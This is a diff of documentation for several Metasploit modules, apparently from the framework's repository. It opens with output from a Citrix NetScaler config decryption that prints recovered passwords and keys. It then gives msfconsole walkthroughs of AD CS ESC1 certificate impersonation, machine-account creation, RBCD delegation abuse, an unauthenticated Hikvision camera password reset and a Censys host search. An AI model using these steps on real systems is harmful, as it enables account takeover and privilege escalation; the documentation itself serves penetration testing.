+[+] Plaintext: YaqoRLtSnnMPgnWyhAedYv2RO1aVtx8
+[*] Config line:
+add ssl certKey mail_cesium137_io -cert mail_cesium137_io-g3.pem -key mail_cesium137_io-g3.key 0e5ca2011772a9943c8f4281668b7236a8dfb97da290487d1953fa5ef768272f33d20122b055878729c75c29efaa3291 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: TBkrkfnP4QOWIT0FX8QCLl2GkNrnM
+[*] Config line:
+add ssl certKey auth_cesium137_io -cert auth_cesium137_io-g3.pem -key auth_cesium137_io-g3.key d574cca92065da27309ce87a423ac82e0c1571cd4c6df59a725f7eabee97d40136a250152506cb15962e34c90f1dc25c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: flEkB3SW4YTTi9HRNnffmvJLSgJhsz5
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue ec5d48485c6871d1d4a2b01f9126946c53aa49eae721c8114ba7a34a1b1f8eabd443a9d641bbf5ef67f2b0237c481673587846db5378f72f9025f0762f8f9cbeebf4a16aaa2782d5c6ecd90c48a1c30d -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction APP01_DUO -serverIP 10.100.10.13 -serverPort 11812 -authTimeout 60 -radKey 535587632ffe91f2559fcf5902c7e4bf24961ee2e7f6285c03c87c2e65165fbc -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication radiusAction APP01_DUO_CITRIXRECEIVER -serverIP 10.100.10.13 -serverPort 21812 -authTimeout 60 -radKey 6644f481004ac7dee5a05b5a8dc3d9d9ae8c76f5fe82e0430b43acd7fb5afe9c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication ldapAction AD_DUA2FAUSERS -serverName ldap.cesium137.io -serverPort 636 -authTimeout 60 -ldapBase "DC=cesium137,DC=io" -ldapBindDn ldap@cesium137.io -ldapBindDnPassword 7fbbf2ef9665641264406c17673c0cdb5774b76454f3ac8c7bb067dd0d2228c5 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -ldapLoginName sAMAccountName -searchFilter "&(objectCategory=user)(memberOf=CN=2FA-OWA,CN=Users,DC=cesium137,DC=io)" -groupAttrName memberOf -subAttributeName cn -secType SSL -passwdChange ENABLED -nestedGroupExtraction ON -groupNameIdentifier sAMAccountName -groupSearchAttribute memberOf -groupSearchSubAttribute CN
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+set ns rpcNode 192.168.10.14 -password 2634fa338c457cb32fdf245873874a9b8fcd7128f6534641f49ea650e9f0974b -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+set ns rpcNode 192.168.10.15 -password 6955e686fc5dd3beee5013dad0e0fa6510a56029b52cc7d7ed15082a60ec6ce4 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password cc1f6bb054f5d63d5eb871fdd36ff573f3343c1e0238965682460c6f084d1e14-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13862
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 5c35e0aa5c3d999e9ff10de1fa32910f9ac28b1ee8824c2301ac964e1f5f987e-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13863
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+add lb monitor mon-radius RADIUS -respCode 2 -userName ldap -password fda3a1c5990558d4bfae059f27191f4c91a2dfa826d7318db287e109f5da39f9 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35  -LRTM DISABLED -resptimeout 4 -destPort 1812 -devno 13864
+[+] User: ldap
+[+] Pass: Gr33n3gg$
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
+template's configuration the resulting certificate can be used for various operations such as authentication.
+PFX certificate files that are saved are encrypted with a blank password.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
+3. Set the `CA`, `RHOSTS`, `SMBUser` and `SMBPass` options
+4. Run the module and see that a new certificate was issued or submitted
+
+## Options
+
+### CA
+The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
+
+### CERT_TEMPLATE
+The certificate template to issue, e.g. "User".
+
+### ALT_DNS
+Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
+
+### ALT_UPN
+Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
+format `$username@$dnsDomainName`.
+
+## Actions
+
+### REQUEST_CERT
+Request a certificate. The certificate PFX file will be stored on success. The certificate file's password is blank.
+
+## Scenarios
+
+### Obtaining Configuration Values
+For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
+by a normal user via LDAP.
+
+```
+msf6 > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
+BIND_DN => aliddle@msflab.local
+msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_ADCS_CAS 
+ACTION => ENUM_ADCS_CAS
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local
+=============================================================================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cacertificatedn       CN=msflab-DC-CA, DC=msflab, DC=local
+ certificatetemplates  ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA |
+                       | Administrator
+ cn                    msflab-DC-CA
+ dnshostname           DC.msflab.local
+ name                  msflab-DC-CA
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
+
+### Issue A Generic Certificate
+In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
+by default. The user must know the CA name, which in this case is `msflab-DC-CA`.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+### Issue A Certificate With A Specific subjectAltName (AKA ESC1)
+In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different
+User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a
+different UPN effectively issues a certificate that can be used to authenticate as another user.
+
+The user must know:
+
+* A vulnerable certificate template, in this case `ESC1-Test`.
+* The UPN of a target account, in this case `smcintyre@msflab.local`.
+
+See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
+information.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
+CERT_TEMPLATE => ESC1-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
+ALT_UPN => smcintyre@msflab.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125859_default_unknown_windows.ad.cs_829589.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```
@@ -0,0 +1,116 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras contain improper authentication logic that allow unauthenticated impersonation of any
+configured user account. This allows an attacker to bypass all security on the camera and
+gain full admin access, allowing them to thereby completely control the camera and modify
+any setting or retrieve sensitive information.
+
+This module allows the attacker to perform an unauthenticated password change on
+any vulnerable Hikvision IP Camera by utilizing the improper authentication logic to
+send a request  to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `username` parameter and will instead use the username
+part of this string as the user to log in as. This can then be used to gain full 
+administrative access to the affected device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled
+camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set USERNAME <name of user>`
+1. `set PASSWORD <new password>`
+1. `check`
+1. `set ID <id of user whose password you want to reset from "check" output>`
+1. `run`
+1. You should get a message that the password for the user has been successfully changed.
+
+## Options
+### STORE_CRED
+This option allows you to store the user and password credentials in the Metasploit database for further use.
+
+## Scenarios
+
+### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
+
+```
+msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
+RHOSTS => 192.168.100.180
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
+PASSWORD => Pa$$W0rd
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
+ID => 1
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
+STORE_CRED => true
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
+
+Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   ID          1                yes       ID (default 1 for admin)
+   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
+                                          t
+   RPORT       80               yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED  true             no        Store credential into the database.
+   USERNAME    admin            yes       Username for password change
+   VHOST                        no        HTTP server virtual host
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[*] Starting the password reset for admin...
+[+] Password reset for admin was successfully completed!
+[*] Please log in with your new password: Pa$$W0rd
+[*] Credentials for admin were added to the database...
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
+```
@@ -0,0 +1,125 @@
+## Vulnerable Application
+
+This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained
+Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in
+DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have
+write access to the target object (the object specified in DELEGATE_TO).
+
+## Verification Steps
+
+1. Set the `RHOST` value to a target domain controller
+2. Set the `BIND_DN` and `BIND_PW` information to an account with the necessary privileges
+3. Set the `DELEGATE_TO` and `DELEGATE_FROM` data store options
+4. Use the `WRITE` action to configure the target for RBCD
+
+## Actions
+
+### FLUSH
+Delete the security descriptor. Unlike the REMOVE action, this deletes the entire security descriptor instead of just
+the matching ACEs.
+
+### READ
+Read the security descriptor and print the ACL contents to identify objects that are currently configured for RBCD.
+
+### REMOVE
+Remove matching ACEs from the security descriptor DACL. Unlike the FLUSH action, this only removes the matching ACEs
+instead of deleting the entire security descriptor.
+
+### WRITE
+Add an ACE to the security descriptor DACL to enable RBCD. The new entry will be appended to the ACL after any existing
+ACEs. No changes are made to the security descriptor if the ACE to enable RBCD already exists.
+
+## Options
+
+### DELEGATE_TO
+The delegation target. This is the object whose ACL is the target of the ACTION (read, write, etc.). The authenticated
+user must have write access to this object.
+
+### DELEGATE_FROM
+The delegation source. This is the object which is added to (if action is WRITE) or removed from (if action is REMOVE)
+the delegation target.
+
+## Scenarios
+
+### Window Server 2019 Domain Controller
+In the following example the user `MSFLAB\sandy` has write access to the computer account `WS01$`. The sandy account is
+used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account.
+
+The new computer account can then impersonate any user, including domain administrators, on `WS01$` by authenticating
+with the Service for User (S4U) Kerberos extension.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass                             no        The password for the specified username
+   SMBUser                             no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+SMBUser => sandy
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.10:445 - Successfully created MSFLAB\DESKTOP-QLSTR9NW$
+[+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
+[+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd 
+msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
+BIND_DN => sandy@msflab.local
+msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_TO WS01$
+DELEGATE_TO => WS01$
+msf6 auxiliary(admin/ldap/rbcd) > read
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
+DELEGATE_FROM => DESKTOP-QLSTR9NW$
+msf6 auxiliary(admin/ldap/rbcd) > write
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > read
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[*] Allowed accounts:
+[*]   DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655)
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > 
+```
@@ -1,212 +1,131 @@
 ## Vulnerable Application

-The module use the Censys REST API to access the same data accessible through web interface.
-The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+The module uses the Censys REST API to access the same data accessible through
+the web interface. The search endpoint allows queries using the Censys Search
+Language against the Hosts dataset. Setting the CERTIFICATES option will also
+retrieve the certificate details for each relevant service by querying the
+Certificates dataset.

 ## Verification Steps

 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
-4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK query`
-6: Do: `run`
+1. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+1. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
+1. Do: `set CERTIFICATES true` (to get certificates details - optional)
+1. Do: `set QUERY <query>`
+1. Do: `run`

 ## Scenarios

-### Certificates Search
+A single keyword or a domain name can be used. For advanced searches, the Censys Search Language can also be used.
+Here, the following query is used to get the hosts running FTP or Telnet in Germany:
+```
+location.country_code: DE and services.service_name: {"FTP", "Telnet"}
+```
+
+### Without certificates details

 ```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE certificates
-CENSYS_SEARCHTYPE => certificates
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted>
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[+] 2.23.14.218 - 21/FTP
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
+[+] 2.23.15.71 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.23.15.238 - 21/FTP,80/HTTP,443/HTTP
+[+] 2.56.11.154 - 21/FTP,22/SSH,25/SMTP,53/DNS,80/HTTP,110/POP3,143/IMAP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,2077/HTTP,2078/HTTP,2079/HTTP,2080/HTTP,2082/HTTP,2083/HTTP,2086/HTTP,2087/HTTP,2095/HTTP,2096/HTTP,3306/MYSQL
+[+] 2.56.11.222 - 21/FTP,22/SSH,80/HTTP,111/PORTMAP,137/NETBIOS,443/HTTP,445/SMB
+[+] 2.56.77.123 - 21/FTP,22/SSH,80/HTTP
+[+] 2.56.77.162 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,5022/SSH,8443/HTTP,50080/HTTP
+[+] 2.56.77.185 - 21/FTP,25/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN
+[+] 2.56.77.186 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN,5060/SIP
+[+] 2.56.77.189 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/HTTP,8080/HTTP,50080/HTTP
 ...
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
